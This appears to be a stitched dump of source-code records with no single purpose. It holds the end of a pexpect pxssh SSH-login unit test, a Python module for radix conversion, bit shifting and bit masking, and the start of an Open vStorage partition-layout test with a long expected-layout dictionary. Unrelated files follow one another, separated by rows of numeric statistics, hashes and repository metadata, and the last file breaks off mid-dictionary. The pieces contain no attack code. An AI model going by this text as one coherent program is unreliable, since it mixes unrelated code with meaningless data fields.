assert False, 'should not have raised exception, pxssh.ExceptionPxssh'
else:
pass
def test_failed_custom_ssh_cmd(self):
try:
ssh = pxssh.pxssh()
cipher_string = '-c invalid_cipher'
result = ssh.login('server', 'me', password='s3cret', cmd='ssh ' + cipher_string + ' -2')
ssh.PROMPT = r'Closed connection'
ssh.sendline('exit')
ssh.prompt(timeout=5)
string = str(ssh.before) + str(ssh.after)
if 'Closed connection' not in string:
assert False, 'should not have completed logging into Mock SSH client and exited'
except pxssh.ExceptionPxssh as e:
pass
else:
assert False, 'should have raised exception, pxssh.ExceptionPxssh'
if __name__ == '__main__':
unittest.main()
| 40.461538
| 108
| 0.616965
| 1,287
| 11,046
| 5.114996
| 0.135975
| 0.029166
| 0.037521
| 0.041319
| 0.839435
| 0.789154
| 0.778824
| 0.73386
| 0.716087
| 0.69558
| 0
| 0.024455
| 0.281821
| 11,046
| 272
| 109
| 40.610294
| 0.80537
| 0.00516
| 0
| 0.685106
| 0
| 0
| 0.198981
| 0.030311
| 0
| 0
| 0
| 0
| 0.089362
| 1
| 0.089362
| false
| 0.114894
| 0.017021
| 0
| 0.114894
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
b4f92b2a99145b826f09b40c5307a72b12e109cf
| 8,155
|
py
|
Python
|
module_bit.py
|
pgming-life/practical_package
|
6a68c4ef9361fc52d8dabbb9cfe04f84914fd015
|
[
"MIT"
] | null | null | null |
module_bit.py
|
pgming-life/practical_package
|
6a68c4ef9361fc52d8dabbb9cfe04f84914fd015
|
[
"MIT"
] | null | null | null |
module_bit.py
|
pgming-life/practical_package
|
6a68c4ef9361fc52d8dabbb9cfe04f84914fd015
|
[
"MIT"
] | null | null | null |
"""module_bit.py"""
"""
Bin, Oct, Dec, Hex mutual conversion
details:
・base: radix number (other than Decimal: 0b, 0o, 0x)
・radix: 2 | 8 | 10 | 16 (int)
・operand: conversion destination (int)
・is_print=True: result print
※Return int
ex) number_conv(base=0b10100, radix=2, operand=16) = 0x14 (return 20(int))
"""
def number_conv(base, radix=16, operand=2, is_print=False):
if radix == 10:
if operand == 2:
num = bin(base)
if is_print:
print("dec→bin: " + "{}".format(num))
return int(num, 0)
elif operand == 8:
num = oct(base)
if is_print:
print("dec→oct: " + "{}".format(num))
return int(num, 0)
elif operand == 16:
num = hex(base)
if is_print:
print("dec→hex: " + "{}".format(num))
return int(num, 0)
else:
if is_print:
print("The operand is incorrect.\nPlease try again.")
elif radix == 2:
if operand == 10:
num = base
if is_print:
print("bin→dec: " + "{}".format(num))
return num
elif operand == 8:
num = oct(base)
if is_print:
print("bin→oct: " + "{}".format(num))
return int(num, 0)
elif operand == 16:
num = hex(base)
if is_print:
print("bin→hex: " + "{}".format(num))
return int(num, 0)
else:
if is_print:
print("The operand is incorrect.\nPlease try again.")
elif radix == 8:
if operand == 10:
num = base
if is_print:
print("oct→dec: " + "{}".format(num))
return num
elif operand == 2:
num = bin(base)
if is_print:
print("oct→bin: " + "{}".format(num))
return int(num, 0)
elif operand == 16:
num = hex(base)
if is_print:
print("oct→hex: " + "{}".format(num))
return int(num, 0)
else:
if is_print:
print("The operand is incorrect.\nPlease try again.")
elif radix == 16:
if operand == 10:
num = base
if is_print:
print("hex→dec: " + "{}".format(num))
return num
elif operand == 2:
num = bin(base)
if is_print:
print("hex→bin: " + "{}".format(num))
return int(num, 0)
elif operand == 8:
num = oct(base)
if is_print:
print("hex→oct: " + "{}".format(num))
return int(num, 0)
else:
if is_print:
print("The operand is incorrect.\nPlease try again.")
else:
if is_print:
print("The radix is incorrect.\nPlease try again.")
"""
Bit Shift
details:
・base: radix number (other than Decimal: 0b, 0o, 0x)
・shift: int
・radix: 2 | 8 | 10 | 16 (int)
・lr: left | right (str)
・is_print=True: result print
※Return int
ex) bit_shift(base=0b10100, shift=3) = 0b10 (return 2(int))
"""
def bit_shift(base, shift, radix=2, lr="right", is_print=False):
if radix == 10:
num0 = bin(base)
if lr == "left":
num1 = bin(base << shift)
if is_print:
print("shift base (dec): " + "{}".format(num0))
print("dec left shift (result): " + "{}".format(num1))
return int(num1, 0)
elif lr == "right":
num1 = bin(base >> shift)
if is_print:
print("shift base (dec): " + "{}".format(num0))
print("dec right shift (result): " + "{}".format(num1))
return int(num1, 0)
else:
if is_print:
print("There is no specification of left shift or right shift.\nPlease try again.")
elif radix == 2:
num0 = bin(base)
if lr == "left":
num1 = bin(base << shift)
if is_print:
print("shift base (bin): " + "{}".format(num0))
print("bin left shift (result): " + "{}".format(num1))
return int(num1, 0)
elif lr == "right":
num1 = bin(base >> shift)
if is_print:
print("shift base (bin): " + "{}".format(num0))
print("bin right shift (result): " + "{}".format(num1))
return int(num1, 0)
else:
if is_print:
print("There is no specification of left shift or right shift.\nPlease try again.")
elif radix == 8:
num0 = bin(base)
if lr == "left":
num1 = bin(base << shift)
if is_print:
print("shift base (oct): " + "{}".format(num0))
print("oct left shift (result): " + "{}".format(num1))
return int(num1, 0)
elif lr == "right":
num1 = bin(base >> shift)
if is_print:
print("shift base (oct): " + "{}".format(num0))
print("oct right shift (result): " + "{}".format(num1))
return int(num1, 0)
else:
if is_print:
print("There is no specification of left shift or right shift.\nPlease try again.")
elif radix == 16:
num0 = bin(base)
if lr == "left":
num1 = bin(base << shift)
if is_print:
print("shift base (hex): " + "{}".format(num0))
print("hex left shift (result): " + "{}".format(num1))
return int(num1, 0)
elif lr == "right":
num1 = bin(base >> shift)
if is_print:
print("shift base (hex): " + "{}".format(num0))
print("hex right shift (result): " + "{}".format(num1))
return int(num1, 0)
else:
if is_print:
print("There is no specification of left shift or right shift.\nPlease try again.")
else:
if is_print:
print("The radix is incorrect.\nPlease try again.")
"""
Bit Mask
details:
・base: int (other than Decimal: 0b, 0o, 0x)
・operand: conversion destination (int)
・is_print=True: result print
※Return int
ex) bit_mask(base=0x01000001, mask=0x000000FF) = 0x1 (return 1(int))
bit_mask(base=bit_shift(0x01000001, 24, 16), mask=0x000000FF) = 0x1 (return 1(int))
"""
def bit_mask(base, mask, operand=16, is_print=False):
if operand == 2:
num0 = bin(base)
num1 = bin(mask)
num2 = bin(base & mask)
if is_print:
print("base (bin): " + "{}".format(num0))
print("mask (bin): " + "{}".format(num1))
print("bin mask (result): " + "{}".format(num2))
return int(num2, 0)
elif operand == 16:
num0 = hex(base)
num1 = hex(mask)
num2 = hex(base & mask)
if is_print:
print("base (hex): " + "{}".format(num0))
print("mask (hex): " + "{}".format(num1))
print("hex mask (result): " + "{}".format(num2))
return int(num2, 0)
else:
if is_print:
print("There is no mask specified for binary or hexadecimal.\nPlease try again.")
"""
Tests
"""
if __name__ == "__main__":
#from module_bit import *
# mutual conversion
print("●Bin, Oct, Dec, Hex mutual conversion")
print(number_conv(0b10100, 2, 16, is_print=True))
print()
# bit shift
print("●bit shift")
print(bit_shift(0b10100, 3, 2, "right", is_print=True))
print()
# bit mask
print("●bit mask")
print(bit_mask(0x01000001, 0x000000FF, 16, is_print=True))
print()
# shift and mask
print("●shift & mask")
print(bit_mask(bit_shift(0x01000001, 24, 16, "right", is_print=True), 0x000000FF, 16, is_print=True))
print()
| 34.555085
| 105
| 0.475782
| 976
| 8,155
| 3.938525
| 0.086066
| 0.080125
| 0.077263
| 0.120187
| 0.823361
| 0.792144
| 0.735952
| 0.707336
| 0.675338
| 0.634755
| 0
| 0.050318
| 0.383446
| 8,155
| 236
| 106
| 34.555085
| 0.708035
| 0.011036
| 0
| 0.764706
| 0
| 0
| 0.214487
| 0
| 0
| 0
| 0.005637
| 0
| 0
| 1
| 0.016043
| false
| 0
| 0
| 0
| 0.13369
| 0.497326
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
b4f9c454a92c0fd48a129b823809714dc43cc229
| 129,887
|
py
|
Python
|
ovs/lib/tests/test_partition_layout.py
|
rootfs-analytics/openvstorage
|
6184822340faea1d2927643330a7aaa781d92d36
|
[
"Apache-2.0"
] | 1
|
2019-10-30T20:50:59.000Z
|
2019-10-30T20:50:59.000Z
|
ovs/lib/tests/test_partition_layout.py
|
rootfs-analytics/openvstorage
|
6184822340faea1d2927643330a7aaa781d92d36
|
[
"Apache-2.0"
] | null | null | null |
ovs/lib/tests/test_partition_layout.py
|
rootfs-analytics/openvstorage
|
6184822340faea1d2927643330a7aaa781d92d36
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 CloudFounders NV
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Flexible partition layout test module
- verify if detected disk configuration is correct
- verify if generated default layout is correct / useable without changes
Example detected disk configuration:
disk_config =
{'sda': {'boot_device': True, 'model': 'Virtual_disk', 'size': 17179869184.0, 'software_raid': False, 'type': 'disk'},
'sdb': {'boot_device': False, 'model': 'Virtual_disk', 'size': 109279444992.0, 'software_raid': False, 'type': 'disk'},
'sdc': {'boot_device': False, 'model': 'Virtual_disk', 'size': 109279444992.0, 'software_raid': False, 'type': 'disk'}}
Disks that should be excluded:
- boot device
- disk with 1 or more partitions being part of a software raid
"""
import unittest
from ovs.lib.setup import SetupController
from ovs.extensions.generic.sshclient import SSHClient
from datadiff import diff
from datadiff.tools import assert_equal
import sys
import pexpect
class PartitionLayout(unittest.TestCase):
full_map = {
'12-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'12-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'4-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'1-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '20', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'1-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '20', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'1-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '20', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'1-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '80', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '20', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'12-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'5-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'12-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'0-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'4-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'9-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'7-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'7-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'7-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'7-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'11-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'11-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'11-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'7-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'11-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'11-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'11-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'11-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'12-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'0-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'12-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
